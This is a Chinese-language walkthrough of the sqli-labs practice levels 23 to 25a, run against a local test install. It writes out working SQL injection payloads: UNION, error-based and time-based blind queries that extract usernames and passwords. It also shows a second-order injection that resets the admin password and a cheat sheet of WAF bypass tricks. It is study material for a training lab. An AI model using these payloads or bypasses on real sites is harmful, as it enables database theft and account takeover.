文章目录
less 23
- 首先在
phpstudy
中打开网站根目录,在第一关的index.php
的文件中加入两行代码echo $sql; echo "<br>";
第一句意思是将我们构造的sql
语句进行输出,第二句意思为换行符,方便我们浏览。 - 输入
?id=1
,查看页面响应 - 当我们输入
?id=1'--+
时,发现未被注释。
- 查看源码发现
#
和--+
均被空格替换
方法1
- 我们尝试第一种解决方法,将注释符用
;%00
代替,其中闭合方式为'
- 使用
order by
查询字段数为3 - 当我们使用联合查询语句查询时,发现页面回显与1,2,3无关
这时尝试将id值用不存在的值进行替换,发现回显为我们所需要的。 - 接下来依次用前面所学到的查库、查表、查字段、查字段的值的查询语句进行查询
方法2(报错注入)
http://127.0.0.1/sqli-labs-master/Less-23/?id=1' and updatexml(1,concat(0x7e,(database())),1) or '1'='1
2.
获得表明
http://127.0.0.1/sqli-labs-master/Less-23/?id=1' and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1)),1) or '1'='1
union select 1,2,group_concat(schema_name)from information_schema.schemata;%00 //查库名
union select 1,2,group_concat(table_name)from information_schemata.tables where table_schema=0x+security的十六进制编码;%00 //查字段
union select 1,2,group_concat(column_name)from information_schemata.tables where table_name=0x+users的十六进制编码;%00 //查字段中的值
union select 1,2,group_concat(concat_ws(0x7e,username,password)) from security.users ;%00
基础知识补充
sql语句定义顺序
(1) SELECT (2)DISTINCT<select_list>
(3) FROM <left_table>
(4) <join_type> JOIN <right_table>
(5) ON <join_condition>
(6) WHERE <where_condition>
(7) GROUP BY <group_by_list>
(8) WITH {CUBE|ROLLUP}
(9) HAVING <having_condition>
(10) ORDER BY <order_by_condition>
(11) LIMIT <limit_number>
sql语句执行顺序
(8) SELECT (9)DISTINCT<select_list>
(1) FROM <left_table>
(3) <join_type> JOIN <right_table>
(2) ON <join_condition>
(4) WHERE <where_condition>
(5) GROUP BY <group_by_list>
(6) WITH {CUBE|ROLLUP}
(7) HAVING <having_condition>
(10) ORDER BY <order_by_list>
(11) LIMIT <limit_number>
基础知识补充——二次注入
二次注入可以理解为,攻击者恶意构造的恶意数据存储在数据库后,恶意数据被读取并进入到SQL查询语句所导致的注入。防御者可能在用户输入恶意数据时对其中的特殊字符进行了转义处理,但在恶意数据插入到数据库时被处理的数据又被还原并存储在数据库中,当web程序调用存储在数据库中的恶意数据并执行SQL查询时,就发生了SQL二次注入。
也就是说在应用程序中输入恶意造的数据库查询语句时会被转义,但在数据库内部调用读取数据时又会被还原。
less 24
- 我首先使用默认账号和密码
admin admin
进行登录,进入到修改数据的界面。 - 我们先不修改密码,我们退出登录后再注册一个新账号(用于二次注入攻击),用户名为
admin'#
,登录密码为123
。 - 登录后进行修改密码的操作,账号填
admin'#
,新密码为123456
。 - 此处修改密码的SQL语句为
UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'
这里的'$curr_pass'
是指定账号的当前(正确)密码,$pass
是要修改的密码,没有进行过滤。
此时的sql语句变为
UPDATE users SET PASSWORD='123456' where username='admin'#' and password='123'
所以真正执行的是
UPDATE users SET PASSWORD='123456' where username='admin'
基础知识补充-SQL注入WAF绕过
WAF
绕过大致可以分为三类:
- 白盒绕过
- 黑盒绕过
fuzz
测试
白盒绕过
通过源代码分析,来进行绕过,类似于代码审计
黑盒绕过
WAF: WAF
称为web
应用防火墙,是通过执行一系列针对HTTP,HTTPS
的安全策略,来专门对web
应用,提供保护的一款产品。
1. 架构层面绕过waf
- 寻找源网站绕过
waf
检测,主要针对的是云waf
,找到源网站的真实地址,进行绕过,有点像CDN
【CDN
的全称是Content Delivery Network
,即内容分发网络。CDN
是构建在网络之上的内容分发网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN
的关键技术主要有内容存储和分发技术。】 - 通过网段绕过
waf
防护,在同一个网段中,可能经过的数据不会经过云waf
,从而实现绕过。
2. 资源限制角度绕过waf
- 一般
waf
的执行需要优先考虑业务优先的原则,所以对于构造较大、超大数据包可能不会进行检测,从而实现绕过waf
3. 协议层面绕过waf
- 协议为覆盖绕过
waf
,比如由于业务需要,只对get
型进行检测,post
数据选择忽略。 - 参数污染,
index?id=1&id=2
,waf
可能只对id=1
进行检测
4. 规则层面的绕过
- sql注释符绕过,例: less23
(1)union /**/ select
,我们将union select之间的空格使用注释符进行替换(适用于union select之间的空格进行检测的情况)
(2)union/*crow%0%32#**/
,我们在注释符中间填充内容
(3)union/*aaaaaaaabbbbbccccdddd%%%%%*/
,构造较大数据
(4)/*union select*/
内联注释,我们使用内联注释,mysql特有的
- 空白符绕过
(1)mysql空白符:%09、%0A、%0B、%0D、%20、%0C、%A0、/*xxx*/
(2)正则空白符:%09、%0A、%0B、%0D、%20
25%
为百分号,%25A0
就是空白符 - 函数分割符号
(1)concat()
(2) conat%2520(
(3)concat/**/(
(4)concat%250c(
(5)concat%25a0(
- 浮点数次法解释
(1)waf
对于id=1
进行检测,但是对于id=1E0(10的0次方)、id=1.0、id=\N
可能就无法检测 - 利用
error-based
(报错)进行sql注入
extractvalue(1,concat(0x5c,md5(3)))
updatexml(1,concat(0x5d,md5(3)))
GeometryCollection((select*from(select*from(select@@version)f)x))
polygon((select*from(select name_const(version(),1))x))
linestring()
multipoint()
multilinestring()
multipolygon()
- mysql特殊语法
select {x schema_name} from {x information_schema.schemata};
select {x 1};
-
大小写绕过(sql语句中不区分大小写)
(1)如果对关键字and or union
等进行了过滤,可以考虑使用大小写混合的方法
(2)Or aNd UniOn
等进行了过滤,这个时候我们可以考虑使用双写的方法
-
关键字重复
(1)OOrc->or
-
关键字替换
(1)如果还是无法绕过,可以考虑替换的方法。
(2)and->&&
、or->||
like
可以替换=
、<>
等价于!=
fuzz测试
- 可以使用
burp
配合进行手工测试,后期测试成功再用脚本进行处理,如:/**/
注释符号中需要多少位字符或者多少位数字可以进行绕过,需要结果burp进行测试。
less 25
- 首先在
phpstudy
中打开网站根目录,在第一关的index.php
的文件中加入两行代码echo $sql; echo "<br>";
第一句意思是将我们构造的sql
语句进行输出,第二句意思为换行符,方便我们浏览。
方法1
- 先使用
http://127.0.0.1/sqli-labs-master/Less-25/?id=1
测试查看结果 - 接着加单引号进行测试出现了报错,添加注释符号–+闭合后再查看响应结果,报错消失。
http://127.0.0.1/sqli-labs-master/Less-25/?id=1'--+
- 查看最下面一行青色的字体,即为我们最终发起的请求的结果。
http://127.0.0.1/sqli-labs-master/Less-25/?id=1' order by 2--+
接着使用order by
进行查询字段数。
我们查看响应结果最下面的一行,发现发起的请求的最终结果的or被过滤。- 这时我们查看题目源码
其中第一行代码的意思是or不区分大小写,且被replace这个函数替换为空;同理,第二行的意识是and不区分大小写,且被replace这个函数替换为空。
- 我们可以尝试上面提到的双写绕过
http://127.0.0.1/sqli-labs-master/Less-25/?id=1' OorRder by 2--+
,发现得到了我们想要的效果。经过测试,字段数为3。
8. 接着我们尝试用联合查询的语句http://127.0.0.1/sqli-labs-master/Less-25/?id=1121' union select 1,2,3--+
,发现2和3得到了回显。
9.
http://127.0.0.1/sqli-labs-master/Less-25/?id=1221' union select 1,2,group_concat(schema_name) from infOorrmation_schema.schemata--+
http://127.0.0.1/sqli-labs-master/Less-25/?id=1221' union select 1,2,group_concat(table_name) from infOorrmation_schema.tables where table_schema=0x7365637572697479--+
http://127.0.0.1/sqli-labs-master/Less-25/?id=1221' union select 1,2,group_concat(column_name) from infOorrmation_schema.columns where table_name=0x7573657273--+
http://127.0.0.1/sqli-labs-master/Less-25/?id=1221' union select 1,2,group_concat(concat_ws(0x7e,username,passwOorRd))from security.users --+
方法2
http://127.0.0.1/sqli-labs-master/Less-25/?id=1221' || '1'='1
尝试报错注入
http://127.0.0.1/sqli-labs-master/Less-25/?id=1221' || updatexml(1,concat(0x7e,(database())),1) || '1'='1
将database()
语句换为我们上面写过的select
语句依次将库名、表名、字段、以及字段中的值进行爆破。
less 25a
- 首先在
phpstudy
中打开网站根目录,在第一关的index.php
的文件中加入两行代码echo $sql; echo "<br>";
第一句意思是将我们构造的sql
语句进行输出,第二句意思为换行符,方便我们浏览。
方法1
- 打开源码我们发现,与上一关相同,将and和or不区分大小写,且用空格代替
- 本关与上一关的区别还有,本关未进行包裹,而上一关使用单引号作为包裹
- 其余步骤与上一关相同。
方法2(基于时间的盲注)
?id=-1 oorr if(length(database())>1,1,sleep(5)) --+ //判断数据库长度
?id=-1 oorr if(length(database())>'a',1,sleep(5)) --+ //判断数据库的组成
其余具体步骤参考十三关